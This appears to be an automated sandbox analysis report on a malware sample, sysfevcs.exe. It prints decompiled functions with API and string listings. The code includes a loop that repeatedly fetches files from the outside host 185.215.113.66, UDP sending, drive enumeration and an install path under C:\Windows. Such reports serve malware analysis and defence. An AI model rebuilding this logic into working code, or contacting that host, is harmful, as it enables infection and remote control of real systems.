                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ce688ee49558b70df954ccc9e83ca4e1fad600f304051d88a26734cb161b826
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C317FB4A00208EBCB10DF94D985BAEB770BB48701F108579E511B73D2C774AE05CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004049E0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				int _v36;
                                                                                                                                                                                                                                                                  				long _t31;
                                                                                                                                                                                                                                                                  				long _t35;
                                                                                                                                                                                                                                                                  				void* _t44;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                  				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				while(_v24 < 2) {
                                                                                                                                                                                                                                                                  					_t31 = RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28); // executed
                                                                                                                                                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 4;
                                                                                                                                                                                                                                                                  						_t35 = RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                                                  						if(_t35 == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						RegCloseKey(_v28); // executed
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                  			}














                                                                                                                                                                                                                                                                  0x004049ec
                                                                                                                                                                                                                                                                  0x004049ef
                                                                                                                                                                                                                                                                  0x004049f6
                                                                                                                                                                                                                                                                  0x004049fd
                                                                                                                                                                                                                                                                  0x00404a04
                                                                                                                                                                                                                                                                  0x00404a16
                                                                                                                                                                                                                                                                  0x00404a34
                                                                                                                                                                                                                                                                  0x00404a3c
                                                                                                                                                                                                                                                                  0x00404a3e
                                                                                                                                                                                                                                                                  0x00404a45
                                                                                                                                                                                                                                                                  0x00404a61
                                                                                                                                                                                                                                                                  0x00404a69
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a91

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                  • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • NoDrives, xrefs: 00404A58
                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404A27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                  • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                                  • Opcode ID: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction ID: 7c4b250e2e372944b684dead308e34dd4c265bb9b8d3a23af7e8a0b56d6b1af5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11CCB1E4020AABDB10CFD4D945BEEB774FB48704F108169E611B7280D7B86A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040B8C0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				signed int* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t49;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                                                                                                                  					L8:
                                                                                                                                                                                                                                                                  					return _v8;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v12 = _a4;
                                                                                                                                                                                                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				E0040B840( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                                                                                                                                  					_v12[7] = E00408880(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                  					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                  						_t45 = CreateThread(0, _a8, _a12, _a16, 0, _a20); // executed
                                                                                                                                                                                                                                                                  						_v16 = _t45;
                                                                                                                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                  							if(_a24 != 0) {
                                                                                                                                                                                                                                                                  								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				goto L8;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040b8c6
                                                                                                                                                                                                                                                                  0x0040b8d1
                                                                                                                                                                                                                                                                  0x0040b9a8
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b8da
                                                                                                                                                                                                                                                                  0x0040b8e4
                                                                                                                                                                                                                                                                  0x0040b8ee
                                                                                                                                                                                                                                                                  0x0040b8fa
                                                                                                                                                                                                                                                                  0x0040b91f
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b93f
                                                                                                                                                                                                                                                                  0x0040b945
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b95c
                                                                                                                                                                                                                                                                  0x0040b96a
                                                                                                                                                                                                                                                                  0x0040b970
                                                                                                                                                                                                                                                                  0x0040b97c
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b9a2
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B880
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: CloseHandle.KERNEL32(?), ref: 0040B899
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE ref: 0040B93F
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                  • Opcode ID: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction ID: 002a0dc9329e903af3e7deb21e8176c7de0be147670cf5542ad48bfb447a56cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C33110B4900208EFDB14DF98D889B9E77B5FF48304F008568F945A7391D778AA95CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00405A20() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				signed int _v44;
                                                                                                                                                                                                                                                                  				char _v148;
                                                                                                                                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                                                                                                                                  				intOrPtr _v160;
                                                                                                                                                                                                                                                                  				intOrPtr _v164;
                                                                                                                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                                                                                                                  				signed int _v172;
                                                                                                                                                                                                                                                                  				signed char _t35;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t46;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v168 = 0x410130;
                                                                                                                                                                                                                                                                  				_v164 = 0x410134;
                                                                                                                                                                                                                                                                  				_v160 = 0x410138;
                                                                                                                                                                                                                                                                  				_v156 = 0x41013c;
                                                                                                                                                                                                                                                                  				_v152 = 0x410140;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  					_v172 = 0;
                                                                                                                                                                                                                                                                  					while(_v172 < 5) {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                  						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                  						_t35 = E0040D160( &_v148, _t45 + _v172 * 4 - 0x28); // executed
                                                                                                                                                                                                                                                                  						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                  						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  							E0040D210( &_v148, 0); // executed
                                                                                                                                                                                                                                                                  							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0xdbba0); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x00405a29
                                                                                                                                                                                                                                                                  0x00405a32
                                                                                                                                                                                                                                                                  0x00405a35
                                                                                                                                                                                                                                                                  0x00405a38
                                                                                                                                                                                                                                                                  0x00405a3b
                                                                                                                                                                                                                                                                  0x00405a3e
                                                                                                                                                                                                                                                                  0x00405a41
                                                                                                                                                                                                                                                                  0x00405a44
                                                                                                                                                                                                                                                                  0x00405a47
                                                                                                                                                                                                                                                                  0x00405a4a
                                                                                                                                                                                                                                                                  0x00405a4d
                                                                                                                                                                                                                                                                  0x00405a57
                                                                                                                                                                                                                                                                  0x00405a61
                                                                                                                                                                                                                                                                  0x00405a6b
                                                                                                                                                                                                                                                                  0x00405a75
                                                                                                                                                                                                                                                                  0x00405a7f
                                                                                                                                                                                                                                                                  0x00405a84
                                                                                                                                                                                                                                                                  0x00405a8a
                                                                                                                                                                                                                                                                  0x00405aa5
                                                                                                                                                                                                                                                                  0x00405ab3
                                                                                                                                                                                                                                                                  0x00405ac6
                                                                                                                                                                                                                                                                  0x00405ac7
                                                                                                                                                                                                                                                                  0x00405ad8
                                                                                                                                                                                                                                                                  0x00405af3
                                                                                                                                                                                                                                                                  0x00405af8
                                                                                                                                                                                                                                                                  0x00405b01
                                                                                                                                                                                                                                                                  0x00405b0c
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405b1b
                                                                                                                                                                                                                                                                  0x00405b1b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                  • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                  • API String ID: 3195947292-2646931437
                                                                                                                                                                                                                                                                  • Opcode ID: 7dea2d89cafdfee17fe590b6422504f9498843d50bfe59cd55d498851da69ff1
                                                                                                                                                                                                                                                                  • Instruction ID: 9179b70c853e6521bba14d82c2a0a6f7832d18f48ba41fe3fbda8a5cdd5ecee7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dea2d89cafdfee17fe590b6422504f9498843d50bfe59cd55d498851da69ff1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C210C70E00318EFCB60DF64CD45B9EBBB4AB49304F5081AAD54DB6281DB795A88CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E0040D8F0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                  				short _v6;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				int* _v24;
                                                                                                                                                                                                                                                                  				char _v25;
                                                                                                                                                                                                                                                                  				char _v29;
                                                                                                                                                                                                                                                                  				int* _v52;
                                                                                                                                                                                                                                                                  				char _v53;
                                                                                                                                                                                                                                                                  				short _t30;
                                                                                                                                                                                                                                                                  				short _t35;
                                                                                                                                                                                                                                                                  				long _t38;
                                                                                                                                                                                                                                                                  				int* _t45;
                                                                                                                                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				int _t64;
                                                                                                                                                                                                                                                                  				long _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = _a4;
                                                                                                                                                                                                                                                                  				_t64 = __eax;
                                                                                                                                                                                                                                                                  				_t30 = 0;
                                                                                                                                                                                                                                                                  				_v25 = 0;
                                                                                                                                                                                                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                  					_t45 = E00408840(_t60);
                                                                                                                                                                                                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                  					_v24 = _t45;
                                                                                                                                                                                                                                                                  					 *_t45 = _t64;
                                                                                                                                                                                                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v10 = 0;
                                                                                                                                                                                                                                                                  					_v6 = 0;
                                                                                                                                                                                                                                                                  					_t35 = _a16;
                                                                                                                                                                                                                                                                  					_v20 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t35);
                                                                                                                                                                                                                                                                  					_v22 = _t35;
                                                                                                                                                                                                                                                                  					_v20 = _a12;
                                                                                                                                                                                                                                                                  					if(_t60 == 0) {
                                                                                                                                                                                                                                                                  						L10:
                                                                                                                                                                                                                                                                  						_v29 = 1;
                                                                                                                                                                                                                                                                  						E00408990(_t45);
                                                                                                                                                                                                                                                                  						return _v29;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t38 = _a4;
                                                                                                                                                                                                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10); // executed
                                                                                                                                                                                                                                                                  							_t67 = _t38;
                                                                                                                                                                                                                                                                  							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                  							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                  							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                  							if(_t60 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v53 = 1;
                                                                                                                                                                                                                                                                  								E00408990(_v52);
                                                                                                                                                                                                                                                                  								return _v53;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                                                                                                                                                  							E00408990(_v52);
                                                                                                                                                                                                                                                                  							_t30 = _v53;
                                                                                                                                                                                                                                                                  							goto L12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t45 = _v52;
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L13:
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040d8f9
                                                                                                                                                                                                                                                                  0x0040d8fe
                                                                                                                                                                                                                                                                  0x0040d900
                                                                                                                                                                                                                                                                  0x0040d903
                                                                                                                                                                                                                                                                  0x0040d909
                                                                                                                                                                                                                                                                  0x0040da0a
                                                                                                                                                                                                                                                                  0x0040da10
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d936
                                                                                                                                                                                                                                                                  0x0040d93d
                                                                                                                                                                                                                                                                  0x0040d941
                                                                                                                                                                                                                                                                  0x0040d945
                                                                                                                                                                                                                                                                  0x0040d947
                                                                                                                                                                                                                                                                  0x0040d94e
                                                                                                                                                                                                                                                                  0x0040d952
                                                                                                                                                                                                                                                                  0x0040d956
                                                                                                                                                                                                                                                                  0x0040d95a
                                                                                                                                                                                                                                                                  0x0040d95f
                                                                                                                                                                                                                                                                  0x0040d96b
                                                                                                                                                                                                                                                                  0x0040d970
                                                                                                                                                                                                                                                                  0x0040d979
                                                                                                                                                                                                                                                                  0x0040d97e
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x0040d9e0
                                                                                                                                                                                                                                                                  0x0040d9e1
                                                                                                                                                                                                                                                                  0x0040d9e6
                                                                                                                                                                                                                                                                  0x0040d9f8
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d998
                                                                                                                                                                                                                                                                  0x0040d99e
                                                                                                                                                                                                                                                                  0x0040d9a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9ad
                                                                                                                                                                                                                                                                  0x0040d9b3
                                                                                                                                                                                                                                                                  0x0040d9b5
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9bb
                                                                                                                                                                                                                                                                  0x0040d9c0
                                                                                                                                                                                                                                                                  0x0040d9c5
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d9fe
                                                                                                                                                                                                                                                                  0x0040da03
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040D947
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040D970
                                                                                                                                                                                                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040D998
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D9AD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: 6c03e7d24b3518993315feaed19266b068d829e5e4ef446baa562ee5b67b4243
                                                                                                                                                                                                                                                                  • Instruction ID: d5c084f29bf55225ac582d60c416bdeb603a939ee1c87b6529a0d2a4f533a5e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c03e7d24b3518993315feaed19266b068d829e5e4ef446baa562ee5b67b4243
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E3185766083419FC710DF69D880AABBBE4AF89714F04457EF9D897382D6349908CBE7
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406251), ref: 004058D8
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(C:\Windows\sysfevcs.exe), ref: 004058E3
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00405908
                                                                                                                                                                                                                                                                    • Part of subcall function 00405640: SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405902
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Windows\sysfevcs.exe, xrefs: 004058DE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
